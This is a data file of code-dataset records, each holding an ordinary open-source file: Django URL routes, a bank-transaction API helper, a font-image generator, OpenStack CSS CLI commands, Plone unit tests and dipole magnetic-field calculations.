+{"seq_id": "456632672", "text": "from django.urls import path\r\nfrom client import views\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\napp_name=\"client\"\r\nurlpatterns = [\r\n path('', views.home, name='home'),\r\n path('menu/', views.menu, name='menu'),\r\n path('profile/', views.profile, name='profile'),\r\n path('preview/', views.preview, name='preview'),\r\n path('submit/', views.submit, name='submit'),\r\n path('update/', views.update, name='update'),\r\n path('register/', views.SignUpPage, name='register'),\r\n path('login/', views.LoginPage, name='login'),\r\n path('logout/', views.logout_view, name='logout'),\r\n]\r\nurlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)\r\n", "sub_path": "updated/StackHackBackend-main/client/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "client.views.home", "line_number": 8, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "client.views.menu", "line_number": 9, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "client.views.profile", "line_number": 10, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "client.views.preview", "line_number": 11, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "client.views.submit", "line_number": 12, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "client.views.update", "line_number": 13, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "client.views.SignUpPage", "line_number": 14, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "client.views.LoginPage", "line_number": 15, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "client.views.logout_view", "line_number": 16, "usage_type": "attribute"}, {"api_name": "client.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 18, "usage_type": "attribute"}]}
+{"seq_id": "172461544", "text": "import requests\n\nfrom backend.utils.requestutil import atbRequests\n\nclass TransactionRequest():\n\n def __init__(self, bank_id, acc_id):\n self.bank_id = bank_id\n self.acc_id = acc_id\n self.request_url = ''\n self.data = None\n atbR = atbRequests()\n self.request_token = atbR.generate_login_token()\n\n def transaction_request(self):\n atb_headers = {\n 'Authorization': 'DirectLogin token={}'.format(self.request_token)\n }\n self.request_url = 'https://api.leapos.ca/obp/v4.0.0/my/banks/{}/accounts/{}/transactions'.format(self.bank_id, self.acc_id)\n response = requests.get(self.request_url, headers=atb_headers)\n data = response.json()\n self.data = data\n return self.data\n\n def format_data(self):\n out_data = []\n for row in self.data.get('transactions'):\n f_data = {\n 'type': row.get('details').get('type'),\n 'timestamp': row.get('details').get('completed'),\n 'description': row.get('details').get('description'),\n 'balance': row.get('details').get('new_balance').get('amount'),\n 'change': row.get('details').get('value').get('amount')\n }\n out_data.append(f_data)\n return out_data", "sub_path": "backend/utils/transactionutil.py", "file_name": "transactionutil.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "backend.utils.requestutil.atbRequests", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "514583348", "text": "from PIL import ImageFont, ImageDraw, Image\nimport os, shutil\nfrom time import time, gmtime, strftime\n\nclass Data:\n\n\n def ready_data(self, w, h, path, testing):\n\n # #check if folder exists if its doesn't create it and if it does\n # #delete and make it a new\n\n if not os.path.exists('fonts'):\n raise ValueError(\"please provide input directory of fonts\")\n\n\n if w<15 or h<15:\n raise ValueError(\"please provide height and weight >15\")\n\n\n if not os.path.exists(path):\n os.makedirs(path)\n print(\"path created\")\n\n\n # #populate array with .ttf files\n ttf = []\n print(\"populating data\")\n for root, dirs, files in os.walk(r'fonts'):\n if(testing==False):\n for file in files:\n if file.endswith('.ttf'):\n ttf.append(file)\n else:\n ttf.append(files[0])\n\n\n # #declare Width and Height Parameters\n\n self.build_data(ttf, w, h, path)\n\n def build_data(self, ttf, W, H, path):\n\n for i in range(0, ttf.__len__()):\n letter = 65\n\n font_name = str(ttf[int(i)])\n font_name = font_name[0:font_name.__len__() - 4]\n\n print(\"Drawing images for \"+font_name)\n for iter in range(0, 2):\n append = \"upper\"\n if(letter==97):\n append=\"lower\"\n\n for alpha in range(0, 26):\n\n im = Image.new(\"RGBA\", (W, H), (255, 255, 255))\n\n draw = ImageDraw.Draw(im)\n\n try:\n\n if not os.path.exists(os.path.join(path, font_name)):\n os.makedirs(os.path.join(path,font_name))\n\n font = ImageFont.truetype(os.path.join('fonts', ttf[int(i)]), H-10)\n\n w, h = draw.textsize(chr(alpha+letter), font=font)\n\n draw.text(((W-w)/2,((H-h)/2)-2), chr(letter+alpha), (0, 0, 0), font=font)\n\n im.save(os.path.join(path,font_name, font_name +\"_\"+append+ \"_\"+chr(letter+alpha)+\".png\"), 'png')\n\n except OSError:\n pass\n shutil.rmtree(os.path.join(path,font_name))\n letter = 97\n\n #uncomment below to have the manifold run\n #FontManifold\n\n\n\n\nif __name__ == '__main__':\n print(\"program starting at: \" + strftime(\" %H:%M:%S\", gmtime()))\n t0 = time()\n Data().ready_data(60, 60, \"test_data\", False)\n print(\"finished after \" + str((time() - t0) / 60.0) + \" minutes\")\n print(\"program program finished at: \" + strftime(\" %H:%M:%S\", gmtime()))", "sub_path": "data_sets.py", "file_name": "data_sets.py", "file_ext": "py", "file_size_in_byte": 2709, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "os.path.exists", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 58, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 60, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": 
"attribute"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 67, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 67, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 87, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 87, "usage_type": "call"}, {"api_name": "time.time", "line_number": 88, "usage_type": "call"}, {"api_name": "time.time", "line_number": 90, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 91, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "403101448", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n'''CSS ELK cluster v1 action implementations'''\nimport logging\n\nfrom osc_lib import utils\nfrom osc_lib.command import command\nfrom otcextensions.common import sdk_utils\n\nfrom otcextensions.i18n import _\n\nLOG = logging.getLogger(__name__)\n\ndef _flatten_output(obj):\n data = {\n 'id': obj.id,\n 'clusterId': obj.clusterId,\n 'name': obj.name,\n 'clustername': obj.clusterName,\n 'started': obj.started,\n 'size': obj.size,\n 'description': obj.description,\n 'status': obj.status,\n 'updated': obj.updated,\n }\n\n\"\"\"\ndef _flatten_output(obj):\n data = {\n 'id': obj.id,\n 'clusterid': obj.clusterId,\n 'name': obj.name,\n 'clustername': obj.clusterName,\n 'status': obj.status,\n 'created': obj.created,\n }\n\"\"\"\n\n\ndef _get_columns(item):\n column_map = {\n }\n return sdk_utils.get_osc_show_columns_for_sdk_resource(item, column_map)\n\n\nclass DeleteCluster(command.Command):\n _description = _('Delete CSS Cluster')\n\n def get_parser(self, prog_name):\n parser = super(DeleteCluster, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster',\n metavar='',\n nargs='+',\n help=_('Name or ID of the tracker to delete.')\n )\n return parser\n\n def take_action(self, parsed_args):\n\n if parsed_args.cluster:\n client = self.app.client_manager.css\n for cluster in parsed_args.cluster:\n client.delete_cluster(cluster=cluster, ignore_missing=False)\n\n\nclass CreateSnapshot(command.ShowOne):\n _description = _('Create a single CSS snapshot')\n\n columns = (\n 'clusterid',\n 'name',\n 'clustername',\n 'status',\n 'created'\n # 'dimensions',\n # 'metric_name',\n # 'unit',\n )\n\n table_columns = (\n 'name',\n # 'dimensions.name',\n # 'dimensions.value',\n # 'metric_name',\n # 'unit',\n )\n\n def get_parser(self, prog_name):\n parser = super(CreateSnapshot, self).get_parser(prog_name)\n\n parser.add_argument(\n '--clusterid',\n metavar='',\n required=True,\n help=_('Specifies the CSS Cluster name OBS bucket name. The value is a string of '\n '0 to 64 characters and can contain uppercase and '\n 'lowercase letters (a to z and A to Z), digits (0 to '\n '9), hyphens (-), underscores (_), and periods (.). '\n 'In addition, it must start and end with a letter.')\n )\n\n parser.add_argument(\n '--name',\n metavar='',\n required=True,\n help=_('Specifies the CSS Cluster name OBS bucket name. The value is a string of '\n '0 to 64 characters and can contain uppercase and '\n 'lowercase letters (a to z and A to Z), digits (0 to '\n '9), hyphens (-), underscores (_), and periods (.). '\n 'In addition, it must start and end with a letter.')\n )\n parser.add_argument(\n '--description',\n metavar='',\n help=_('Specifies the prefix of a log that needs to be stored '\n 'in an OBS bucket. 
The value is a string of 0 to 64 '\n 'characters and can contain uppercase and lowercase '\n 'letters (a to z and A to Z), digits (0 to 9), '\n 'hyphens (-), underscores (_), and periods (.)')\n )\n parser.add_argument(\n '--indices',\n metavar='',\n help=_('Specifies whether SMN is supported. When the value is '\n '`false`, `topic_id` and `operations` can be left empty.')\n )\n return parser\n\n def take_action(self, parsed_args):\n\n client = self.app.client_manager.css\n\n attrs = {}\n\n if parsed_args.name:\n attrs['name'] = parsed_args.name\n if parsed_args.clusterid:\n attrs['clusterid'] = parsed_args.clusterid\n if parsed_args.description:\n attrs['description'] = parsed_args.description\n if parsed_args.indices:\n attrs['indices'] = parsed_args.indices\n\n obj = client.create_snapshot(**attrs)\n\n \"\"\"\n obj = list(obj)\n\n obj = obj[0][\"backup\"]\n\n table = (self.columns,\n (utils.get_dict_properties(\n _flatten_output(s), self.columns\n ) for s in obj))\n return table\n\n \"\"\"\n\n display_columns, columns = _get_columns(obj)\n data = utils.get_item_properties(obj, columns)\n\n return (display_columns, data)\n\n\nclass ShowCluster(command.ShowOne):\n _description = _('Show details of a CSS cluster')\n\n def get_parser(self, prog_name):\n parser = super(ShowCluster, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster',\n metavar='',\n # default='system',\n help=_('Cluster name (currently only `system`)')\n )\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.css\n\n data = client.get_cluster(\n cluster=parsed_args.cluster,\n )\n\n display_columns, columns = _get_columns(data)\n data = utils.get_item_properties(data, columns)\n\n return (display_columns, data)\n\n\nclass RestartCluster(command.ShowOne):\n _description = _('Show details of a CSS cluster')\n\n def get_parser(self, prog_name):\n parser = super(RestartCluster, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster',\n metavar='',\n # default='system',\n help=_('Cluster name (currently only `system`)')\n )\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.css\n\n data = client.restart_cluster(\n cluster=parsed_args.cluster,\n )\n\n display_columns, columns = _get_columns(data)\n data = utils.get_item_properties(data, columns)\n\n return (display_columns, data)\n\n\nclass Snapshots(command.Lister):\n _description = _('List of CSS Backups')\n columns = (\n 'id',\n 'clusterid',\n 'clustername',\n 'name',\n 'clustername',\n 'status',\n 'created'\n # 'dimensions',\n # 'metric_name',\n # 'unit',\n )\n\n\n\n def get_parser(self, prog_name):\n parser = super(Snapshots, self).get_parser(prog_name)\n parser.add_argument(\n 'cluster_id',\n metavar='',\n help=_('Cluster id')\n )\n return parser\n\n def take_action(self, parsed_args):\n client = self.app.client_manager.css\n\n query = {}\n if parsed_args.cluster_id:\n query['cluster_id'] = parsed_args.cluster_id\n\n \"\"\"\n if parsed_args.namespace:\n query['namespace'] = parsed_args.namespace\n if parsed_args.metric_name:\n query['metric_name'] = parsed_args.metric_name\n if parsed_args.unit:\n query['unit'] = parsed_args.unit\n \"\"\"\n\n data = client.snapshots(**query)\n # data = client.clusters()\n\n data = list(data)\n # data = data[\"backups\"]\n # for s in range(data):\n # if data[s] is None:\n # data.remove(s)\n\n table = (self.columns,\n (utils.get_dict_properties(\n _flatten_output(s), self.columns\n ) for s in data))\n return table\n", "sub_path": 
"otcextensions/osclient/css/v1/snapshot.py", "file_name": "snapshot.py", "file_ext": "py", "file_size_in_byte": 8262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 22, "usage_type": "call"}, {"api_name": "otcextensions.common.sdk_utils.get_osc_show_columns_for_sdk_resource", "line_number": 53, "usage_type": "call"}, {"api_name": "otcextensions.common.sdk_utils", "line_number": 53, "usage_type": "name"}, {"api_name": "osc_lib.command.command.Command", "line_number": 56, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 56, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 57, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 65, "usage_type": "call"}, {"api_name": "osc_lib.command.command.ShowOne", "line_number": 77, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 77, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 78, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 106, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 117, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 126, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 135, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_item_properties", "line_number": 171, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 171, "usage_type": "name"}, {"api_name": "osc_lib.command.command.ShowOne", "line_number": 176, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 176, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 177, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 185, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_item_properties", "line_number": 197, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 197, "usage_type": "name"}, {"api_name": "osc_lib.command.command.ShowOne", "line_number": 202, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 202, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 203, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 211, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_item_properties", "line_number": 223, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 223, "usage_type": "name"}, {"api_name": "osc_lib.command.command.Lister", "line_number": 228, "usage_type": "attribute"}, {"api_name": "osc_lib.command.command", "line_number": 228, "usage_type": "name"}, {"api_name": "otcextensions.i18n._", "line_number": 229, "usage_type": "call"}, {"api_name": "otcextensions.i18n._", "line_number": 250, "usage_type": "call"}, {"api_name": "osc_lib.utils.get_dict_properties", "line_number": 280, "usage_type": "call"}, {"api_name": "osc_lib.utils", "line_number": 280, "usage_type": "name"}]}
+{"seq_id": "335517362", "text": "import unittest2 as unittest\nfrom genweb.core.testing import GENWEB_INTEGRATION_TESTING\nfrom genweb.core.testing import GENWEB_FUNCTIONAL_TESTING\nfrom AccessControl import Unauthorized\nfrom zope.component import getMultiAdapter, queryUtility\nfrom zope.interface import alsoProvides\nfrom Products.CMFCore.utils import getToolByName\n\nfrom plone.testing.z2 import Browser\nfrom plone.app.testing import TEST_USER_ID, TEST_USER_NAME\nfrom plone.app.testing import login, logout\nfrom plone.app.testing import setRoles\nfrom plone.app.testing import applyProfile\n\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletAssignmentMapping\n\nfrom genweb.core.interfaces import IHomePage\nfrom genweb.theme.portlets import homepage\n\nimport transaction\n\n\nclass IntegrationTest(unittest.TestCase):\n\n layer = GENWEB_INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n\n def testPortalConstrains(self):\n portal_allowed_types = ['Folder', 'File', 'Image', 'Document']\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.assertEqual(sorted([ct.id for ct in self.portal.allowedContentTypes()]), sorted(portal_allowed_types))\n\n def testLinkBehavior(self):\n \"\"\"Test for Link behavior and related index and metadata\"\"\"\n portal = self.layer['portal']\n setRoles(portal, TEST_USER_ID, ['Manager'])\n login(portal, TEST_USER_NAME)\n portal.invokeFactory('Folder', 'f2', title=u\"Soc una carpeta\")\n f2 = portal['f2']\n f2.invokeFactory('Link', 'enllac', title=u\"Soc un link\")\n link = f2['enllac']\n link.open_link_in_new_window = False\n link.reindexObject()\n\n self.assertEqual(link.open_link_in_new_window, False)\n\n results = portal.portal_catalog.searchResults(portal_type='Link')\n self.assertEqual(results[0].open_link_in_new_window, False)\n\n link.open_link_in_new_window = True\n link.reindexObject()\n\n results = portal.portal_catalog.searchResults(portal_type='Link')\n self.assertEqual(results[0].open_link_in_new_window, True)\n\n def testHomePageMarkerInterface(self):\n self.assertTrue(IHomePage.providedBy(self.portal['front-page']))\n\n def testAdapters(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.portal.invokeFactory('Document', 'test_adapter', title=u\"Soc una pagina\")\n from genweb.core.adapters import IImportant\n obj = IImportant(self.portal.test_adapter)\n self.assertEqual(obj.is_important, False)\n obj.is_important = True\n obj2 = IImportant(self.portal.test_adapter)\n self.assertEqual(obj2.is_important, True)\n\n def test_favorites(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.portal.invokeFactory('Folder', 'prova', title=u\"Soc una carpeta\")\n prova = self.portal['prova']\n prova.invokeFactory('Folder', 'prova', title=u\"Soc una carpeta\")\n prova2 = prova['prova']\n\n from genweb.core.adapters.favorites import IFavorite\n IFavorite(prova2).add(TEST_USER_NAME)\n self.assertTrue(TEST_USER_NAME in IFavorite(prova2).get())\n self.assertTrue(TEST_USER_NAME not in IFavorite(prova).get())\n\n def test_protected_content(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n self.portal.invokeFactory('Folder', 'test_folder', title=u\"Soc una carpeta\")\n self.portal.test_folder.invokeFactory('Document', 'test_document', title=u\"Soc un document\")\n 
from genweb.core.interfaces import IProtectedContent\n alsoProvides(self.portal.test_folder, IProtectedContent)\n setRoles(self.portal, TEST_USER_ID, ['Reader', 'Editor'])\n\n self.portal.test_folder.manage_delObjects('test_document')\n\n self.assertRaises(Unauthorized, self.portal.manage_delObjects, 'test_folder')\n\n\nclass FunctionalTest(unittest.TestCase):\n\n layer = GENWEB_FUNCTIONAL_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n self.request = self.layer['request']\n self.app = self.layer['app']\n self.browser = Browser(self.app)\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n\n # Create a portlet in a slot\n benvingut = self.portal['front-page']\n manager = queryUtility(IPortletManager, name='genweb.portlets.HomePortletManager2', context=benvingut)\n assignments = getMultiAdapter((benvingut, manager), IPortletAssignmentMapping)\n homepage_assignment = homepage.Assignment()\n assignments['homepage'] = homepage_assignment\n transaction.commit()\n setRoles(self.portal, TEST_USER_ID, ['Member'])\n\n def testHomePagePortlet(self):\n portalURL = self.portal.absolute_url()\n\n self.browser.open(portalURL)\n\n self.assertTrue('Congratulations! You have successfully installed Plone.' in self.browser.contents)\n", "sub_path": "genweb/core/tests/test_basic.py", "file_name": "test_basic.py", "file_ext": "py", "file_size_in_byte": 5134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "unittest2.TestCase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "genweb.core.testing.GENWEB_INTEGRATION_TESTING", "line_number": 26, "usage_type": "name"}, {"api_name": "plone.app.testing.setRoles", "line_number": 34, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 34, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 35, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 35, "usage_type": "argument"}, {"api_name": "plone.app.testing.setRoles", "line_number": 41, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 41, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 42, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 42, "usage_type": "argument"}, {"api_name": "genweb.core.interfaces.IHomePage.providedBy", "line_number": 62, "usage_type": "call"}, {"api_name": "genweb.core.interfaces.IHomePage", "line_number": 62, "usage_type": "name"}, {"api_name": "plone.app.testing.setRoles", "line_number": 65, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 65, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 66, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 66, "usage_type": "argument"}, {"api_name": "genweb.core.adapters.IImportant", "line_number": 69, "usage_type": "call"}, {"api_name": "genweb.core.adapters.IImportant", "line_number": 72, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 76, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 76, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 77, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 77, "usage_type": "argument"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 84, "usage_type": 
"argument"}, {"api_name": "genweb.core.adapters.favorites.IFavorite", "line_number": 84, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 85, "usage_type": "name"}, {"api_name": "genweb.core.adapters.favorites.IFavorite", "line_number": 85, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 86, "usage_type": "name"}, {"api_name": "genweb.core.adapters.favorites.IFavorite", "line_number": 86, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 89, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 89, "usage_type": "argument"}, {"api_name": "plone.app.testing.login", "line_number": 90, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_NAME", "line_number": 90, "usage_type": "argument"}, {"api_name": "zope.interface.alsoProvides", "line_number": 94, "usage_type": "call"}, {"api_name": "genweb.core.interfaces.IProtectedContent", "line_number": 94, "usage_type": "name"}, {"api_name": "plone.app.testing.setRoles", "line_number": 95, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 95, "usage_type": "argument"}, {"api_name": "AccessControl.Unauthorized", "line_number": 99, "usage_type": "argument"}, {"api_name": "unittest2.TestCase", "line_number": 102, "usage_type": "attribute"}, {"api_name": "genweb.core.testing.GENWEB_FUNCTIONAL_TESTING", "line_number": 104, "usage_type": "name"}, {"api_name": "plone.testing.z2.Browser", "line_number": 110, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 111, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 111, "usage_type": "argument"}, {"api_name": "zope.component.queryUtility", "line_number": 115, "usage_type": "call"}, {"api_name": "plone.portlets.interfaces.IPortletManager", "line_number": 115, "usage_type": "argument"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 116, "usage_type": "call"}, {"api_name": "plone.portlets.interfaces.IPortletAssignmentMapping", "line_number": 116, "usage_type": "argument"}, {"api_name": "genweb.theme.portlets.homepage.Assignment", "line_number": 117, "usage_type": "call"}, {"api_name": "genweb.theme.portlets.homepage", "line_number": 117, "usage_type": "name"}, {"api_name": "transaction.commit", "line_number": 119, "usage_type": "call"}, {"api_name": "plone.app.testing.setRoles", "line_number": 120, "usage_type": "call"}, {"api_name": "plone.app.testing.TEST_USER_ID", "line_number": 120, "usage_type": "argument"}]}
+{"seq_id": "429742723", "text": "import numpy as np\nfrom scipy import linalg\n\n\ndef dipole_field(xv, b0=-31100):\n \"\"\"\n \"\"\"\n bx = lambda x,y,z: 3*b0*x*z/np.sqrt(x*x+y*y+z*z)**5\n by = lambda x,y,z: 3*b0*y*z/np.sqrt(x*x+y*y+z*z)**5\n bz = lambda x,y,z: b0*(2*z*z-x*x-y*y)/np.sqrt(x*x+y*y+z*z)**5\n \n bvec = np.r_[bx(*xv), by(*xv), bz(*xv)]\n \n return bvec\n\n\ndef dipole_gradient(xv, b0=-31100, r_e=6371, dx=0.01):\n \"\"\"Estimate gradient of dipole field\n \n Uses finite differences becauseit saves dev time over\n calculating derivatives analytically.\n \"\"\"\n \n bx = lambda x, y, z: 3*b0*x*z/np.sqrt(x*x+y*y+z*z)**5\n by = lambda x, y, z: 3*b0*y*z/np.sqrt(x*x+y*y+z*z)**5\n bz = lambda x, y, z: b0*(2*z*z-x*x-y*y)/np.sqrt(x*x+y*y+z*z)**5\n df = lambda f, x, d: (f(x+d)-f(x-d))/(2*d)\n \n dbxdx = df(lambda x: bx(x, xv[1], xv[2]), xv[0], dx)\n dbxdy = df(lambda x: bx(xv[0], x, xv[2]), xv[1], dx)\n dbxdz = df(lambda x: bx(xv[0], xv[1], x), xv[2], dx)\n gradbx = np.r_[dbxdx, dbxdy, dbxdz]/r_e\n \n dbydx = df(lambda x: by(x, xv[1], xv[2]), xv[0], dx)\n dbydy = df(lambda x: by(xv[0], x, xv[2]), xv[1], dx)\n dbydz = df(lambda x: by(xv[0], xv[1], x), xv[2], dx)\n gradby = np.r_[dbydx, dbydy, dbydz]/r_e\n \n dbzdx = df(lambda x: bz(x, xv[1], xv[2]), xv[0], dx)\n dbzdy = df(lambda x: bz(xv[0], x, xv[2]), xv[1], dx)\n dbzdz = df(lambda x: bz(xv[0], xv[1], x), xv[2], dx)\n gradbz = np.r_[dbzdx, dbzdy, dbzdz]/r_e\n \n gradb = np.c_[gradbx, gradby, gradbz]\n \n return gradb\n\n\ndef grad_bmag(xv, r_e=6371, dx=0.01):\n \"\"\"Calculate the gradient of the magnetic field magnitude\"\"\"\n btot = lambda x, y, z: linalg.norm(dipole_field([x, y, z]))\n df = lambda f, x: (f(x + dx) - f(x - dx))/(2*dx)\n bgradx = df(lambda x: btot(x, xv[1], xv[2]), xv[0])\n bgrady = df(lambda x: btot(xv[0], x, xv[2]), xv[1])\n bgradz = df(lambda x: btot(xv[0], xv[1], x), xv[2])\n return np.r_[bgradx, bgrady, bgradz]/r_e\n", "sub_path": "ptm_python/ptm_dipole.py", "file_name": "ptm_dipole.py", "file_ext": "py", "file_size_in_byte": 1954, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "numpy.sqrt", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 12, "usage_type": "attribute"}, 